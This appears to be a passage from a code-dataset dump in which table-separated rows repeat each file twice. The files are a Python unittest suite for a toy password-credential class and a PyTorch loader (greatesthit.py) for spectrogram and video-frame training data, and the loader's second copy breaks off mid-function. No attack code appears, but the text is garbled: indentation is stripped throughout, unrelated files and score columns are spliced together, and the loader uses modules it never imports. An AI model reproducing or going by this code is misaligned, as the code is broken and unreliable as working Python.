model.learn(total_episodes=5000, ckpt_interval=100, ckpt_path=args.ckpt) | 0.589362 | 0.262975 |
import unittest #importing the unittest module
from credential import Credential #importing the credential class
class TestCredential(unittest.TestCase):
'''
Test case defines test cases for the credential class behaivors
'''
def setUp(self):
'''
set up to run before each test case
'''
self.new_credential = Credential('Abdul','Instagram','z.i.z.o.u1','@!#') # create new credential object
def test_init(self):
'''
test_init to test if the object is initialized properly
'''
self.assertEqual(self.new_credential.name,'Abdul')
self.assertEqual(self.new_credential.social_media,'Instagram')
self.assertEqual(self.new_credential.user_name,'z.i.z.o.u1')
self.assertEqual(self.new_credential.password,'@!#')
def test_save_credential(self):
'''
test_save_credential test case to test if the user credential is saved into the credential_list
'''
self.new_credential.save_credential() #save new user credential
self.assertEqual(len(Credential.credential_list),1)
def tearDown(self):
'''
tearDown method that does clean up after each test case is run
'''
Credential.credential_list = []
def test_save_multiple_credential(self):
'''
test_save_multiple_credential to check if we can save multiple user credential
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
self.assertEqual(len(Credential.credential_list),2)
def test_delete_credential(self):
'''
test_delete_credential to test if we can remove a user credential from our credential_list
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
self.new_credential.delete_credential() #Deleting a user credential object
self.assertEqual(len(Credential.credential_list),1)
def test_find_credential_by_user_name(self):
'''
test to check if we can find a user credential by the username and displays information
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
found_credential = Credential.find_by_user_name('jidmore')
self.assertEqual(found_credential.social_media,test_credential.social_media)
def test_display_all_credential(self):
'''
method that returns a list of user credentials saved
'''
self.assertEqual(Credential.display_credentials(),Credential.credential_list)
if __name__ == '__main__':
unittest.main() | credential_test.py | import unittest #importing the unittest module
from credential import Credential #importing the credential class
class TestCredential(unittest.TestCase):
'''
Test case defines test cases for the credential class behaivors
'''
def setUp(self):
'''
set up to run before each test case
'''
self.new_credential = Credential('Abdul','Instagram','z.i.z.o.u1','@!#') # create new credential object
def test_init(self):
'''
test_init to test if the object is initialized properly
'''
self.assertEqual(self.new_credential.name,'Abdul')
self.assertEqual(self.new_credential.social_media,'Instagram')
self.assertEqual(self.new_credential.user_name,'z.i.z.o.u1')
self.assertEqual(self.new_credential.password,'@!#')
def test_save_credential(self):
'''
test_save_credential test case to test if the user credential is saved into the credential_list
'''
self.new_credential.save_credential() #save new user credential
self.assertEqual(len(Credential.credential_list),1)
def tearDown(self):
'''
tearDown method that does clean up after each test case is run
'''
Credential.credential_list = []
def test_save_multiple_credential(self):
'''
test_save_multiple_credential to check if we can save multiple user credential
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
self.assertEqual(len(Credential.credential_list),2)
def test_delete_credential(self):
'''
test_delete_credential to test if we can remove a user credential from our credential_list
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
self.new_credential.delete_credential() #Deleting a user credential object
self.assertEqual(len(Credential.credential_list),1)
def test_find_credential_by_user_name(self):
'''
test to check if we can find a user credential by the username and displays information
'''
self.new_credential.save_credential()
test_credential = Credential('Majid','Snapchat','jidmore','abcd')
test_credential.save_credential()
found_credential = Credential.find_by_user_name('jidmore')
self.assertEqual(found_credential.social_media,test_credential.social_media)
def test_display_all_credential(self):
'''
method that returns a list of user credentials saved
'''
self.assertEqual(Credential.display_credentials(),Credential.credential_list)
if __name__ == '__main__':
unittest.main() | 0.395951 | 0.374162 |
from matplotlib import collections
import json
import os
import copy
import torch
from torchvision import transforms
import numpy as np
from tqdm import tqdm
from random import sample
import torchaudio
import logging
import collections
from glob import glob
import sys
import albumentations
sys.path.insert(0, '.') # nopep8
from train import instantiate_from_config
from specvqgan.data.transforms import *
torchaudio.set_audio_backend("sox_io")
logger = logging.getLogger(f'main.{__name__}')
SR = 22050
FPS = 15
MAX_SAMPLE_ITER = 10
def non_negative(x): return int(np.round(max(0, x), 0))
def get_GH_data_identifier(video_name, start_idx, split='_'):
if isinstance(start_idx, str):
return video_name + split + start_idx
elif isinstance(start_idx, int):
return video_name + split + str(start_idx)
else:
raise NotImplementedError
class Crop(object):
def __init__(self, cropped_shape=None, random_crop=False):
self.cropped_shape = cropped_shape
if cropped_shape is not None:
mel_num, spec_len = cropped_shape
if random_crop:
self.cropper = albumentations.RandomCrop
else:
self.cropper = albumentations.CenterCrop
self.preprocessor = albumentations.Compose([self.cropper(mel_num, spec_len)])
else:
self.preprocessor = lambda **kwargs: kwargs
def __call__(self, item):
item['image'] = self.preprocessor(image=item['image'])['image']
if 'cond_image' in item.keys():
item['cond_image'] = self.preprocessor(image=item['cond_image'])['image']
return item
class CropImage(Crop):
def __init__(self, *crop_args):
super().__init__(*crop_args)
class CropFeats(Crop):
def __init__(self, *crop_args):
super().__init__(*crop_args)
def __call__(self, item):
item['feature'] = self.preprocessor(image=item['feature'])['image']
return item
class CropCoords(Crop):
def __init__(self, *crop_args):
super().__init__(*crop_args)
def __call__(self, item):
item['coord'] = self.preprocessor(image=item['coord'])['image']
return item
class ResampleFrames(object):
def __init__(self, feat_sample_size, times_to_repeat_after_resample=None):
self.feat_sample_size = feat_sample_size
self.times_to_repeat_after_resample = times_to_repeat_after_resample
def __call__(self, item):
feat_len = item['feature'].shape[0]
## resample
assert feat_len >= self.feat_sample_size
# evenly spaced points (abcdefghkl -> aoooofoooo)
idx = np.linspace(0, feat_len, self.feat_sample_size, dtype=np.int, endpoint=False)
# xoooo xoooo -> ooxoo ooxoo
shift = feat_len // (self.feat_sample_size + 1)
idx = idx + shift
## repeat after resampling (abc -> aaaabbbbcccc)
if self.times_to_repeat_after_resample is not None and self.times_to_repeat_after_resample > 1:
idx = np.repeat(idx, self.times_to_repeat_after_resample)
item['feature'] = item['feature'][idx, :]
return item
class GreatestHitSpecs(torch.utils.data.Dataset):
def __init__(self, split, spec_dir_path, spec_len, random_crop, mel_num,
spec_crop_len, L=2.0, rand_shift=False, spec_transforms=None, splits_path='./data',
meta_path='./data/info_r2plus1d_dim1024_15fps.json'):
super().__init__()
self.split = split
self.specs_dir = spec_dir_path
self.spec_transforms = spec_transforms
self.splits_path = splits_path
self.meta_path = meta_path
self.spec_len = spec_len
self.rand_shift = rand_shift
self.L = L
self.spec_take_first = int(math.ceil(860 * (L / 10.) / 32) * 32)
self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
greatesthit_meta = json.load(open(self.meta_path, 'r'))
unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
self.label2target = {label: target for target, label in enumerate(unique_classes)}
self.target2label = {target: label for label, target in self.label2target.items()}
self.video_idx2label = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
}
self.available_video_hit = list(self.video_idx2label.keys())
self.video_idx2path = {
vh: os.path.join(self.specs_dir,
vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') +'_mel.npy')
for vh in self.available_video_hit
}
self.video_idx2idx = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
i for i in range(len(greatesthit_meta['video_name']))
}
split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
if not os.path.exists(split_clip_ids_path):
raise NotImplementedError()
clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
self.dataset = clip_video_hit
spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
self.spec_transforms = transforms.Compose([
CropImage([mel_num, spec_crop_len], random_crop),
transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=0),
transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=0)
])
self.video2indexes = {}
for video_idx in self.dataset:
video, start_idx = video_idx.split('_')
if video not in self.video2indexes.keys():
self.video2indexes[video] = []
self.video2indexes[video].append(start_idx)
for video in self.video2indexes.keys():
if len(self.video2indexes[video]) == 1: # given video contains only one hit
self.dataset.remove(
get_GH_data_identifier(video, self.video2indexes[video][0])
)
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
item = {}
video_idx = self.dataset[idx]
spec_path = self.video_idx2path[video_idx]
spec = np.load(spec_path) # (80, 860)
if self.rand_shift:
shift = random.uniform(0, 0.5)
spec_shift = int(shift * spec.shape[1] // 10)
# Since only the first second is used
spec = np.roll(spec, -spec_shift, 1)
# concat spec outside dataload
item['image'] = 2 * spec - 1 # (80, 860)
item['image'] = item['image'][:, :self.spec_take_first]
item['file_path'] = spec_path
item['label'] = self.video_idx2label[video_idx]
item['target'] = self.label2target[item['label']]
if self.spec_transforms is not None:
item = self.spec_transforms(item)
return item
class GreatestHitSpecsTrain(GreatestHitSpecs):
def __init__(self, specs_dataset_cfg):
super().__init__('train', **specs_dataset_cfg)
class GreatestHitSpecsValidation(GreatestHitSpecs):
def __init__(self, specs_dataset_cfg):
super().__init__('valid', **specs_dataset_cfg)
class GreatestHitSpecsTest(GreatestHitSpecs):
def __init__(self, specs_dataset_cfg):
super().__init__('test', **specs_dataset_cfg)
class CondGreatestHitSpecsCondOnImage(torch.utils.data.Dataset):
def __init__(self, split, specs_dir, spec_len, feat_len, feat_depth, feat_crop_len, random_crop, mel_num, spec_crop_len,
vqgan_L=10.0, L=1.0, rand_shift=False, spec_transforms=None, frame_transforms=None, splits_path='./data',
meta_path='./data/info_r2plus1d_dim1024_15fps.json', frame_path='data/greatesthit/greatesthit_processed',
p_outside_cond=0., p_audio_aug=0.5):
super().__init__()
self.split = split
self.specs_dir = specs_dir
self.spec_transforms = spec_transforms
self.frame_transforms = frame_transforms
self.splits_path = splits_path
self.meta_path = meta_path
self.frame_path = frame_path
self.feat_len = feat_len
self.feat_depth = feat_depth
self.feat_crop_len = feat_crop_len
self.spec_len = spec_len
self.rand_shift = rand_shift
self.L = L
self.spec_take_first = int(math.ceil(860 * (vqgan_L / 10.) / 32) * 32)
self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
self.p_outside_cond = torch.tensor(p_outside_cond)
greatesthit_meta = json.load(open(self.meta_path, 'r'))
unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
self.label2target = {label: target for target, label in enumerate(unique_classes)}
self.target2label = {target: label for label, target in self.label2target.items()}
self.video_idx2label = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
}
self.available_video_hit = list(self.video_idx2label.keys())
self.video_idx2path = {
vh: os.path.join(self.specs_dir,
vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') +'_mel.npy')
for vh in self.available_video_hit
}
for value in self.video_idx2path.values():
assert os.path.exists(value)
self.video_idx2idx = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
i for i in range(len(greatesthit_meta['video_name']))
}
split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
if not os.path.exists(split_clip_ids_path):
self.make_split_files()
clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
self.dataset = clip_video_hit
spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
self.spec_transforms = transforms.Compose([
CropImage([mel_num, spec_crop_len], random_crop),
transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=p_audio_aug),
transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=p_audio_aug)
])
if self.frame_transforms == None:
self.frame_transforms = transforms.Compose([
Resize3D(128),
RandomResizedCrop3D(112, scale=(0.5, 1.0)),
RandomHorizontalFlip3D(),
ColorJitter3D(brightness=0.1, saturation=0.1),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
self.video2indexes = {}
for video_idx in self.dataset:
video, start_idx = video_idx.split('_')
if video not in self.video2indexes.keys():
self.video2indexes[video] = []
self.video2indexes[video].append(start_idx)
for video in self.video2indexes.keys():
if len(self.video2indexes[video]) == 1: # given video contains only one hit
self.dataset.remove(
get_GH_data_identifier(video, self.video2indexes[video][0])
)
clip_classes = [self.label2target[self.video_idx2label[vh]] for vh in clip_video_hit]
class2count = collections.Counter(clip_classes)
self.class_counts = torch.tensor([class2count[cls] for cls in range(len(class2count))])
if self.L != 1.0:
print(split, L)
self.validate_data()
self.video2indexes = {}
for video_idx in self.dataset:
video, start_idx = video_idx.split('_')
if video not in self.video2indexes.keys():
self.video2indexes[video] = []
self.video2indexes[video].append(start_idx)
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
item = {}
try:
video_idx = self.dataset[idx]
spec_path = self.video_idx2path[video_idx]
spec = np.load(spec_path) # (80, 860)
video, start_idx = video_idx.split('_')
frame_path = os.path.join(self.frame_path, video, 'frames')
start_frame_idx = non_negative(FPS * int(start_idx)/SR)
end_frame_idx = non_negative(start_frame_idx + FPS * self.L)
if self.rand_shift:
shift = random.uniform(0, 0.5)
spec_shift = int(shift * spec.shape[1] // 10)
# Since only the first second is used
spec = np.roll(spec, -spec_shift, 1)
start_frame_idx += int(FPS * shift)
end_frame_idx += int(FPS * shift)
frames = [Image.open(os.path.join(
frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
range(start_frame_idx, end_frame_idx)]
# Sample condition
if torch.all(torch.bernoulli(self.p_outside_cond) == 1.):
# Sample condition from outside video
all_idx = set(list(range(len(self.dataset))))
all_idx.remove(idx)
cond_video_idx = self.dataset[sample(all_idx, k=1)[0]]
cond_video, cond_start_idx = cond_video_idx.split('_')
else:
cond_video = video
video_hits_idx = copy.copy(self.video2indexes[video])
video_hits_idx.remove(start_idx)
cond_start_idx = sample(video_hits_idx, k=1)[0]
cond_video_idx = get_GH_data_identifier(cond_video, cond_start_idx)
cond_spec_path = self.video_idx2path[cond_video_idx]
cond_spec = np.load(cond_spec_path) # (80, 860)
cond_video, cond_start_idx = cond_video_idx.split('_')
cond_frame_path = os.path.join(self.frame_path, cond_video, 'frames')
cond_start_frame_idx = non_negative(FPS * int(cond_start_idx)/SR)
cond_end_frame_idx = non_negative(cond_start_frame_idx + FPS * self.L)
if self.rand_shift:
cond_shift = random.uniform(0, 0.5)
cond_spec_shift = int(cond_shift * cond_spec.shape[1] // 10)
# Since only the first second is used
cond_spec = np.roll(cond_spec, -cond_spec_shift, 1)
cond_start_frame_idx += int(FPS * cond_shift)
cond_end_frame_idx += int(FPS * cond_shift)
cond_frames = [Image.open(os.path.join(
cond_frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
range(cond_start_frame_idx, cond_end_frame_idx)]
# concat spec outside dataload
item['image'] = 2 * spec - 1 # (80, 860)
item['cond_image'] = 2 * cond_spec - 1 # (80, 860)
item['image'] = item['image'][:, :self.spec_take_first]
item['cond_image'] = item['cond_image'][:, :self.spec_take_first]
item['file_path_specs_'] = spec_path
item['file_path_cond_specs_'] = cond_spec_path
if self.frame_transforms is not None:
cond_frames = self.frame_transforms(cond_frames)
frames = self.frame_transforms(frames)
item['feature'] = np.stack(cond_frames + frames, axis=0) # (30 * L, 112, 112, 3)
item['file_path_feats_'] = (frame_path, start_frame_idx)
item['file_path_cond_feats_'] = (cond_frame_path, cond_start_frame_idx)
item['label'] = self.video_idx2label[video_idx]
item['target'] = self.label2target[item['label']]
if self.spec_transforms is not None:
item = self.spec_transforms(item)
except Exception:
print(sys.exc_info()[2])
print('!!!!!!!!!!!!!!!!!!!!', video_idx, cond_video_idx)
print('!!!!!!!!!!!!!!!!!!!!', end_frame_idx, cond_end_frame_idx)
exit(1)
return item
def validate_data(self):
original_len = len(self.dataset)
valid_dataset = []
for video_idx in tqdm(self.dataset):
video, start_idx = video_idx.split('_')
frame_path = os.path.join(self.frame_path, video, 'frames')
start_frame_idx = non_negative(FPS * int(start_idx)/SR)
end_frame_idx = non_negative(start_frame_idx + FPS * (self.L + 0.6))
if os.path.exists(os.path.join(frame_path, f'frame{end_frame_idx:0>6d}.jpg')):
valid_dataset.append(video_idx)
else:
self.video2indexes[video].remove(start_idx)
for video_idx in valid_dataset:
video, start_idx = video_idx.split('_')
if len(self.video2indexes[video]) == 1:
valid_dataset.remove(video_idx)
if original_len != len(valid_dataset):
print(f'Validated dataset with enough frames: {len(valid_dataset)}')
self.dataset = valid_dataset
split_clip_ids_path = os.path.join(self.splits_path, f'greatesthit_{self.split}_{self.L:.2f}.json')
if not os.path.exists(split_clip_ids_path):
with open(split_clip_ids_path, 'w') as f:
json.dump(valid_dataset, f)
def make_split_files(self, ratio=[0.85, 0.1, 0.05]):
random.seed(1337)
print(f'The split files do not exist @ {self.splits_path}. Calculating the new ones.')
# The downloaded videos (some went missing on YouTube and no longer available)
available_mel_paths = set(glob(os.path.join(self.specs_dir, '*_mel.npy')))
self.available_video_hit = [vh for vh in self.available_video_hit if self.video_idx2path[vh] in available_mel_paths]
all_video = list(self.video2indexes.keys())
print(f'The number of clips available after download: {len(self.available_video_hit)}')
print(f'The number of videos available after download: {len(all_video)}')
available_idx = list(range(len(all_video)))
random.shuffle(available_idx)
assert sum(ratio) == 1.
cut_train = int(ratio[0] * len(all_video))
cut_test = cut_train + int(ratio[1] * len(all_video))
train_idx = available_idx[:cut_train]
test_idx = available_idx[cut_train:cut_test]
valid_idx = available_idx[cut_test:]
train_video = [all_video[i] for i in train_idx]
test_video = [all_video[i] for i in test_idx]
valid_video = [all_video[i] for i in valid_idx]
train_video_hit = []
for v in train_video:
train_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
test_video_hit = []
for v in test_video:
test_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
valid_video_hit = []
for v in valid_video:
valid_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
# mix train and valid for better validation loss
mixed = train_video_hit + valid_video_hit
random.shuffle(mixed)
split = int(len(mixed) * ratio[0] / (ratio[0] + ratio[2]))
train_video_hit = mixed[:split]
valid_video_hit = mixed[split:]
with open(os.path.join(self.splits_path, 'greatesthit_train.json'), 'w') as train_file,\
open(os.path.join(self.splits_path, 'greatesthit_test.json'), 'w') as test_file,\
open(os.path.join(self.splits_path, 'greatesthit_valid.json'), 'w') as valid_file:
json.dump(train_video_hit, train_file)
json.dump(test_video_hit, test_file)
json.dump(valid_video_hit, valid_file)
print(f'Put {len(train_idx)} clips to the train set and saved it to ./data/greatesthit_train.json')
print(f'Put {len(test_idx)} clips to the test set and saved it to ./data/greatesthit_test.json')
print(f'Put {len(valid_idx)} clips to the valid set and saved it to ./data/greatesthit_valid.json')
class CondGreatestHitSpecsCondOnImageTrain(CondGreatestHitSpecsCondOnImage):
def __init__(self, dataset_cfg):
train_transforms = transforms.Compose([
Resize3D(128),
RandomResizedCrop3D(112, scale=(0.5, 1.0)),
RandomHorizontalFlip3D(),
ColorJitter3D(brightness=0.1, saturation=0.1),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
super().__init__('train', frame_transforms=train_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageValidation(CondGreatestHitSpecsCondOnImage):
def __init__(self, dataset_cfg):
valid_transforms = transforms.Compose([
Resize3D(128),
CenterCrop3D(112),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
super().__init__('valid', frame_transforms=valid_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageTest(CondGreatestHitSpecsCondOnImage):
def __init__(self, dataset_cfg):
test_transforms = transforms.Compose([
Resize3D(128),
CenterCrop3D(112),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
super().__init__('test', frame_transforms=test_transforms, **dataset_cfg)
if __name__ == '__main__':
import sys
from omegaconf import OmegaConf
cfg = OmegaConf.load('configs/greatesthit_transformer_with_vNet_randshift_2s_outside_video.yaml')
data = instantiate_from_config(cfg.data)
data.prepare_data()
data.setup()
print(len(data.datasets['train']))
# print(data.datasets['train'][24])
# print(data.datasets['validation'][24])
# print(data.datasets['test'][24])
# print(data.datasets['train'][24]['feature'].shape) | specvqgan/data/greatesthit.py | from matplotlib import collections
import json
import os
import copy
import torch
from torchvision import transforms
import numpy as np
from tqdm import tqdm
from random import sample
import torchaudio
import logging
import collections
from glob import glob
import sys
import albumentations
sys.path.insert(0, '.') # nopep8
from train import instantiate_from_config
from specvqgan.data.transforms import *
torchaudio.set_audio_backend("sox_io")
logger = logging.getLogger(f'main.{__name__}')
SR = 22050
FPS = 15
MAX_SAMPLE_ITER = 10
def non_negative(x): return int(np.round(max(0, x), 0))
def get_GH_data_identifier(video_name, start_idx, split='_'):
if isinstance(start_idx, str):
return video_name + split + start_idx
elif isinstance(start_idx, int):
return video_name + split + str(start_idx)
else:
raise NotImplementedError
class Crop(object):
def __init__(self, cropped_shape=None, random_crop=False):
self.cropped_shape = cropped_shape
if cropped_shape is not None:
mel_num, spec_len = cropped_shape
if random_crop:
self.cropper = albumentations.RandomCrop
else:
self.cropper = albumentations.CenterCrop
self.preprocessor = albumentations.Compose([self.cropper(mel_num, spec_len)])
else:
self.preprocessor = lambda **kwargs: kwargs
def __call__(self, item):
item['image'] = self.preprocessor(image=item['image'])['image']
if 'cond_image' in item.keys():
item['cond_image'] = self.preprocessor(image=item['cond_image'])['image']
return item
class CropImage(Crop):
def __init__(self, *crop_args):
super().__init__(*crop_args)
class CropFeats(Crop):
def __init__(self, *crop_args):
super().__init__(*crop_args)
def __call__(self, item):
item['feature'] = self.preprocessor(image=item['feature'])['image']
return item
class CropCoords(Crop):
def __init__(self, *crop_args):
super().__init__(*crop_args)
def __call__(self, item):
item['coord'] = self.preprocessor(image=item['coord'])['image']
return item
class ResampleFrames(object):
def __init__(self, feat_sample_size, times_to_repeat_after_resample=None):
self.feat_sample_size = feat_sample_size
self.times_to_repeat_after_resample = times_to_repeat_after_resample
def __call__(self, item):
feat_len = item['feature'].shape[0]
## resample
assert feat_len >= self.feat_sample_size
# evenly spaced points (abcdefghkl -> aoooofoooo)
idx = np.linspace(0, feat_len, self.feat_sample_size, dtype=np.int, endpoint=False)
# xoooo xoooo -> ooxoo ooxoo
shift = feat_len // (self.feat_sample_size + 1)
idx = idx + shift
## repeat after resampling (abc -> aaaabbbbcccc)
if self.times_to_repeat_after_resample is not None and self.times_to_repeat_after_resample > 1:
idx = np.repeat(idx, self.times_to_repeat_after_resample)
item['feature'] = item['feature'][idx, :]
return item
class GreatestHitSpecs(torch.utils.data.Dataset):
def __init__(self, split, spec_dir_path, spec_len, random_crop, mel_num,
spec_crop_len, L=2.0, rand_shift=False, spec_transforms=None, splits_path='./data',
meta_path='./data/info_r2plus1d_dim1024_15fps.json'):
super().__init__()
self.split = split
self.specs_dir = spec_dir_path
self.spec_transforms = spec_transforms
self.splits_path = splits_path
self.meta_path = meta_path
self.spec_len = spec_len
self.rand_shift = rand_shift
self.L = L
self.spec_take_first = int(math.ceil(860 * (L / 10.) / 32) * 32)
self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
greatesthit_meta = json.load(open(self.meta_path, 'r'))
unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
self.label2target = {label: target for target, label in enumerate(unique_classes)}
self.target2label = {target: label for label, target in self.label2target.items()}
self.video_idx2label = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
}
self.available_video_hit = list(self.video_idx2label.keys())
self.video_idx2path = {
vh: os.path.join(self.specs_dir,
vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') +'_mel.npy')
for vh in self.available_video_hit
}
self.video_idx2idx = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
i for i in range(len(greatesthit_meta['video_name']))
}
split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
if not os.path.exists(split_clip_ids_path):
raise NotImplementedError()
clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
self.dataset = clip_video_hit
spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
self.spec_transforms = transforms.Compose([
CropImage([mel_num, spec_crop_len], random_crop),
transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=0),
transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=0)
])
self.video2indexes = {}
for video_idx in self.dataset:
video, start_idx = video_idx.split('_')
if video not in self.video2indexes.keys():
self.video2indexes[video] = []
self.video2indexes[video].append(start_idx)
for video in self.video2indexes.keys():
if len(self.video2indexes[video]) == 1: # given video contains only one hit
self.dataset.remove(
get_GH_data_identifier(video, self.video2indexes[video][0])
)
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
item = {}
video_idx = self.dataset[idx]
spec_path = self.video_idx2path[video_idx]
spec = np.load(spec_path) # (80, 860)
if self.rand_shift:
shift = random.uniform(0, 0.5)
spec_shift = int(shift * spec.shape[1] // 10)
# Since only the first second is used
spec = np.roll(spec, -spec_shift, 1)
# concat spec outside dataload
item['image'] = 2 * spec - 1 # (80, 860)
item['image'] = item['image'][:, :self.spec_take_first]
item['file_path'] = spec_path
item['label'] = self.video_idx2label[video_idx]
item['target'] = self.label2target[item['label']]
if self.spec_transforms is not None:
item = self.spec_transforms(item)
return item
class GreatestHitSpecsTrain(GreatestHitSpecs):
def __init__(self, specs_dataset_cfg):
super().__init__('train', **specs_dataset_cfg)
class GreatestHitSpecsValidation(GreatestHitSpecs):
def __init__(self, specs_dataset_cfg):
super().__init__('valid', **specs_dataset_cfg)
class GreatestHitSpecsTest(GreatestHitSpecs):
def __init__(self, specs_dataset_cfg):
super().__init__('test', **specs_dataset_cfg)
class CondGreatestHitSpecsCondOnImage(torch.utils.data.Dataset):
def __init__(self, split, specs_dir, spec_len, feat_len, feat_depth, feat_crop_len, random_crop, mel_num, spec_crop_len,
vqgan_L=10.0, L=1.0, rand_shift=False, spec_transforms=None, frame_transforms=None, splits_path='./data',
meta_path='./data/info_r2plus1d_dim1024_15fps.json', frame_path='data/greatesthit/greatesthit_processed',
p_outside_cond=0., p_audio_aug=0.5):
super().__init__()
self.split = split
self.specs_dir = specs_dir
self.spec_transforms = spec_transforms
self.frame_transforms = frame_transforms
self.splits_path = splits_path
self.meta_path = meta_path
self.frame_path = frame_path
self.feat_len = feat_len
self.feat_depth = feat_depth
self.feat_crop_len = feat_crop_len
self.spec_len = spec_len
self.rand_shift = rand_shift
self.L = L
self.spec_take_first = int(math.ceil(860 * (vqgan_L / 10.) / 32) * 32)
self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
self.p_outside_cond = torch.tensor(p_outside_cond)
greatesthit_meta = json.load(open(self.meta_path, 'r'))
unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
self.label2target = {label: target for target, label in enumerate(unique_classes)}
self.target2label = {target: label for label, target in self.label2target.items()}
self.video_idx2label = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
}
self.available_video_hit = list(self.video_idx2label.keys())
self.video_idx2path = {
vh: os.path.join(self.specs_dir,
vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') +'_mel.npy')
for vh in self.available_video_hit
}
for value in self.video_idx2path.values():
assert os.path.exists(value)
self.video_idx2idx = {
get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
i for i in range(len(greatesthit_meta['video_name']))
}
split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
if not os.path.exists(split_clip_ids_path):
self.make_split_files()
clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
self.dataset = clip_video_hit
spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
self.spec_transforms = transforms.Compose([
CropImage([mel_num, spec_crop_len], random_crop),
transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=p_audio_aug),
transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=p_audio_aug)
])
if self.frame_transforms == None:
self.frame_transforms = transforms.Compose([
Resize3D(128),
RandomResizedCrop3D(112, scale=(0.5, 1.0)),
RandomHorizontalFlip3D(),
ColorJitter3D(brightness=0.1, saturation=0.1),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
self.video2indexes = {}
for video_idx in self.dataset:
video, start_idx = video_idx.split('_')
if video not in self.video2indexes.keys():
self.video2indexes[video] = []
self.video2indexes[video].append(start_idx)
for video in self.video2indexes.keys():
if len(self.video2indexes[video]) == 1: # given video contains only one hit
self.dataset.remove(
get_GH_data_identifier(video, self.video2indexes[video][0])
)
clip_classes = [self.label2target[self.video_idx2label[vh]] for vh in clip_video_hit]
class2count = collections.Counter(clip_classes)
self.class_counts = torch.tensor([class2count[cls] for cls in range(len(class2count))])
if self.L != 1.0:
print(split, L)
self.validate_data()
self.video2indexes = {}
for video_idx in self.dataset:
video, start_idx = video_idx.split('_')
if video not in self.video2indexes.keys():
self.video2indexes[video] = []
self.video2indexes[video].append(start_idx)
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
item = {}
try:
